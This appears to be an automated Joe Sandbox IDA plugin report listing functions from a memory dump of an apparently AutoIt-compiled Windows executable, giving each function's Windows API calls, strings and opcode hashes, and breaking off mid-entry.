0, xrefs: 00DE3C54
F, xrefs: 00DE3D4E

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: ded177b6ccc5f1c74057b795389d2af2b66afa77a663457a72b6ff34d21b8686
Instruction ID: f6c00e42977a44833abf4e7dcb9cb3176dbc6892b65dd27130d2c46bf450f6a8
Opcode Fuzzy Hash: ded177b6ccc5f1c74057b795389d2af2b66afa77a663457a72b6ff34d21b8686
Instruction Fuzzy Hash: 55416D75A01349EFDB14EF65D888AAA77B5FF49350F180028F946AB360D730AA11CFA0

Function 00DE3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DE3A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DE3AA0
GetWindowLongW.USER32(?,000000F0), ref: 00DE3AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DE3AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DE3B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00DE3BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00DE3BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00DE3BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00DE3BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00DE3C13

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 3fec922e5cb8fb01e9ea008da3324c5bb1701e05acf5d8de7dc352904cb45b43
Instruction ID: 197570893de2e392ad1c9db449fbb97fa596ee448f17f6b09c91df6cc65e869c
Opcode Fuzzy Hash: 3fec922e5cb8fb01e9ea008da3324c5bb1701e05acf5d8de7dc352904cb45b43
Instruction Fuzzy Hash: DA617D75900248AFDB10EF68CC85EFE77B8EB49700F140199FA15A72A1C770AE45DB60

Function 00DBB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00DBB151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB165
GetWindowThreadProcessId.USER32(00000000), ref: 00DBB16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 00DBB18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB21D

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 1ea8a697dbca493ae1efc9a9048ff4d9a5106fd854ea8a5877078adc82c6ec6e
Instruction ID: 25b19f0c72518d15fe9d250ffb2df7c76909af2698466b90df3fd3e4adcadf39
Opcode Fuzzy Hash: 1ea8a697dbca493ae1efc9a9048ff4d9a5106fd854ea8a5877078adc82c6ec6e
Instruction Fuzzy Hash: FB318271610304EFDB20AF25DC84FAE7B6ABB51361F14500AF912EA250D7F49D468F74

Function 00D82C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D82C94

Part of subcall function 00D829C8: HeapFree.KERNEL32(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0

_free.LIBCMT ref: 00D82CA0
_free.LIBCMT ref: 00D82CAB
_free.LIBCMT ref: 00D82CB6
_free.LIBCMT ref: 00D82CC1
_free.LIBCMT ref: 00D82CCC
_free.LIBCMT ref: 00D82CD7
_free.LIBCMT ref: 00D82CE2
_free.LIBCMT ref: 00D82CED
_free.LIBCMT ref: 00D82CFB

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1f61f02d19df9127bdc48699408e8489c461c019d57733f565008cdb65a7cc9c
Instruction ID: fd8c2c17b9dad9346c04f91351f0b77e3ca99e739b2039a3d8e16b596e49d414
Opcode Fuzzy Hash: 1f61f02d19df9127bdc48699408e8489c461c019d57733f565008cdb65a7cc9c
Instruction Fuzzy Hash: 84115076540108BFCB02FF54D982CAD3BA5FF05350F5245A5FA489B222DB35EA509FB0

Function 00DC7DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DC7FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00DC7FC1
GetFileAttributesW.KERNEL32(?), ref: 00DC7FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00DC8005
SetCurrentDirectoryW.KERNEL32(?), ref: 00DC8017
SetCurrentDirectoryW.KERNEL32(?), ref: 00DC8060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DC80B0

Strings

*.*, xrefs: 00DC8066

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: f9b56eece88ed540da2e517b5a5c5a08df631f5030e0655a49c793a86f9d6f0f
Instruction ID: 78decca34f5cfd9719ef8b892d6fca578bf47f8a0b8b7fc8bd6ccfa2c99f757b
Opcode Fuzzy Hash: f9b56eece88ed540da2e517b5a5c5a08df631f5030e0655a49c793a86f9d6f0f
Instruction Fuzzy Hash: D9817D725083429BCB20EF54C884EAAB3E8BF89351F18485EF885D7250EB34DD499F72

Function 00D55BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00D55C7A

Part of subcall function 00D55D0A: GetClientRect.USER32(?,?), ref: 00D55D30
Part of subcall function 00D55D0A: GetWindowRect.USER32(?,?), ref: 00D55D71
Part of subcall function 00D55D0A: ScreenToClient.USER32(?,?), ref: 00D55D99

GetDC.USER32 ref: 00D946F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D94708
SelectObject.GDI32(00000000,00000000), ref: 00D94716
SelectObject.GDI32(00000000,00000000), ref: 00D9472B
ReleaseDC.USER32(?,00000000), ref: 00D94733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D947C4

Strings

U, xrefs: 00D94693

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 5c46690813b0a7e2560abec8b48fb91f50dfc4eb204f4cbda916d6a095915cb6
Instruction ID: f74afb027ce6c041e396f68eb13afcfaf32bfbb95c89fc7a87d789ef131bee6a
Opcode Fuzzy Hash: 5c46690813b0a7e2560abec8b48fb91f50dfc4eb204f4cbda916d6a095915cb6
Instruction Fuzzy Hash: 6671BE31400209DFCF229FA4C984EBA3BB5FF4A365F184269ED555A26AC7319846DFB0

Function 00DC359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00DC35E4

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

LoadStringW.USER32(00E22390,?,00000FFF,?), ref: 00DC360A

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00DC3724
^ ERROR, xrefs: 00DC36C9
Line %d (File "%s"):, xrefs: 00DC366B
Error: , xrefs: 00DC36EF
"%s" (%d) : ==> %s:, xrefs: 00DC3742

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 2739de1a04f367b233cb91dc2bf827fa4212740ee674f760215323324c3237d5
Instruction ID: a447885207d3bded968827e05434e62270cd5f1fac1b23cb621eb709b40bbea4
Opcode Fuzzy Hash: 2739de1a04f367b233cb91dc2bf827fa4212740ee674f760215323324c3237d5
Instruction Fuzzy Hash: 82517D7280024ABADF14EBA0CC52EEDBB75EF14341F144169F915721A1EB306B99DF70

Function 00DCC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DCC272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DCC29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DCC2CA
GetLastError.KERNEL32 ref: 00DCC322
SetEvent.KERNEL32(?), ref: 00DCC336
InternetCloseHandle.WININET(00000000), ref: 00DCC341

Strings

, xrefs: 00DCC2BB

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 71e63d03290dc009d799f004605fd17172a3db87c2777fd6e7e84eb22035c4a7
Instruction ID: 1381f4fc9e6156122ee47723e8b8e9740ffd142171feb496c9496784ef4e6b4a
Opcode Fuzzy Hash: 71e63d03290dc009d799f004605fd17172a3db87c2777fd6e7e84eb22035c4a7
Instruction Fuzzy Hash: 62319CB1520749AFD721AF649888FAB7AFCEB49740B08951EF58AD7210DB30DD058B70

Function 00DB989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D93AAF,?,?,Bad directive syntax error,00DECC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00DB98BC
LoadStringW.USER32(00000000,?,00D93AAF,?), ref: 00DB98C3

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00DB9987

Strings

Line %d (File "%s"):, xrefs: 00DB992D
%s (%d) : ==> %s.: %s %s, xrefs: 00DB98F1
Error: , xrefs: 00DB9955
., xrefs: 00DB996D
Line %d:, xrefs: 00DB9912

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 887f0ba40892ae3baff2bd2c66715246db6f0d51b576d30546efd3d4d216ed85
Instruction ID: 091f38bff71a78849a6fd891298b4ba4d7cbd9b53a3efeffc9b307d48c57b905
Opcode Fuzzy Hash: 887f0ba40892ae3baff2bd2c66715246db6f0d51b576d30546efd3d4d216ed85
Instruction Fuzzy Hash: D0216B3290035EEBDF11AF90CC56EEEB735FF18301F045469FA25660A2EA719A58CB30

Function 00DB209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00DB20AB
GetClassNameW.USER32(00000000,?,00000100), ref: 00DB20C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00DB214D

Strings

smallicons, xrefs: 00DB2115
SHELLDLL_DefView, xrefs: 00DB20CC
list, xrefs: 00DB212F
largeicons, xrefs: 00DB20E1
details, xrefs: 00DB20FB

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 372c70d9c82d1cccfc532f190961328d7f2ad0b72e0b92c7e2180668af90f192
Instruction ID: 7db796edf2df819a5b1da6a5896062f49d79c4e0b3ea3580921e49f4c7d51e8d
Opcode Fuzzy Hash: 372c70d9c82d1cccfc532f190961328d7f2ad0b72e0b92c7e2180668af90f192
Instruction Fuzzy Hash: 141106776C8706F9F6112224DC07DF7379CCB44764B20501AFB0AF90E5FA65A8425A34

Function 00D88D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 986ba052033020c16c18b1f24c975b924f06cb247f53ab39ecf0d976f2f3c7b8
Instruction ID: 0ca14fdb91867ce1214c00db8b6e21661f735e0b6e41cd1f43eaca6bc2e33cc5
Opcode Fuzzy Hash: 986ba052033020c16c18b1f24c975b924f06cb247f53ab39ecf0d976f2f3c7b8
Instruction Fuzzy Hash: DFC1D274A04249AFDB21FFA8C851BBDBBB4AF49310F1C4199F995A7392C7309942CB71

Function 00D8CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00D8CEB7
_free.LIBCMT ref: 00D8CF22
_free.LIBCMT ref: 00D8CF48
_free.LIBCMT ref: 00D8CF71
_free.LIBCMT ref: 00D8CFA9
_free.LIBCMT ref: 00D8CFDA
_free.LIBCMT ref: 00D8D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00D8D09C
_free.LIBCMT ref: 00D8D0B5

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 0c1554bd38c620fa7ae981359ed7ccd0cd49869972b4e614fcb4fa7a3df63474
Instruction ID: 3b3b821d08689da1b2b76fb4aed18d1e337cb9ba9b012c154371b94468b091b7
Opcode Fuzzy Hash: 0c1554bd38c620fa7ae981359ed7ccd0cd49869972b4e614fcb4fa7a3df63474
Instruction Fuzzy Hash: 33610671906305EFEB31BFB59881A797BAAEF05310F19416EFA44A72C2D73599028B70

Function 00DE50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00DE5186
ShowWindow.USER32(?,00000000), ref: 00DE51C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 00DE51CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00DE51D1

Part of subcall function 00DE6FBA: DeleteObject.GDI32(00000000), ref: 00DE6FE6

GetWindowLongW.USER32(?,000000F0), ref: 00DE520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DE521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00DE524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00DE5287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00DE5296

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: d91bbbc2895062b69f80e8b43e3b261e8fe7348a9267687d822b869904ab1854
Instruction ID: 37e568a9aa3f5b548a0315a29d235cb88a211a17f5e75e151ed5ce3c4f40cb26
Opcode Fuzzy Hash: d91bbbc2895062b69f80e8b43e3b261e8fe7348a9267687d822b869904ab1854
Instruction Fuzzy Hash: 7B51C530A50B88BFEF20BF26EC45BD93B65FB053A9F184011F6199A2E5C3719980DB71

Function 00D68B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00DA6890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00DA68A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DA68B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00DA68D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DA68F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D68874,00000000,00000000,00000000,000000FF,00000000), ref: 00DA6901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DA691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00D68874,00000000,00000000,00000000,000000FF,00000000), ref: 00DA692D

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: eb6f2d5263e77fd217c9a3156b5aa1cecad3dfb8a36cfd2f8ae7c7e9eb3598f5
Instruction ID: 29a02c88fca5da0436271ae2411579a3ceda566149e1b7d669506f5e1a359919
Opcode Fuzzy Hash: eb6f2d5263e77fd217c9a3156b5aa1cecad3dfb8a36cfd2f8ae7c7e9eb3598f5
Instruction Fuzzy Hash: 9D519B70600309EFDB20DF29CC95FAA77B5EB58750F184618F956E72A0DB70E981EB60

Function 00DCC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DCC182
GetLastError.KERNEL32 ref: 00DCC195
SetEvent.KERNEL32(?), ref: 00DCC1A9

Part of subcall function 00DCC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DCC272
Part of subcall function 00DCC253: GetLastError.KERNEL32 ref: 00DCC322
Part of subcall function 00DCC253: SetEvent.KERNEL32(?), ref: 00DCC336
Part of subcall function 00DCC253: InternetCloseHandle.WININET(00000000), ref: 00DCC341

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: f87aef223646ca3f66619227064aac3913648abdbafd32902cbc68b062fc3215
Instruction ID: 83e04053a39b0b0d4a14b667127e80fe7a7db406c62b1d6a0194c2989d53b910
Opcode Fuzzy Hash: f87aef223646ca3f66619227064aac3913648abdbafd32902cbc68b062fc3215
Instruction Fuzzy Hash: B5318971620742AFDB21AFA59C44F66BBE9FF18300B08641DFA5ACB610D730E8119BB0

Function 00DB25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB3A57
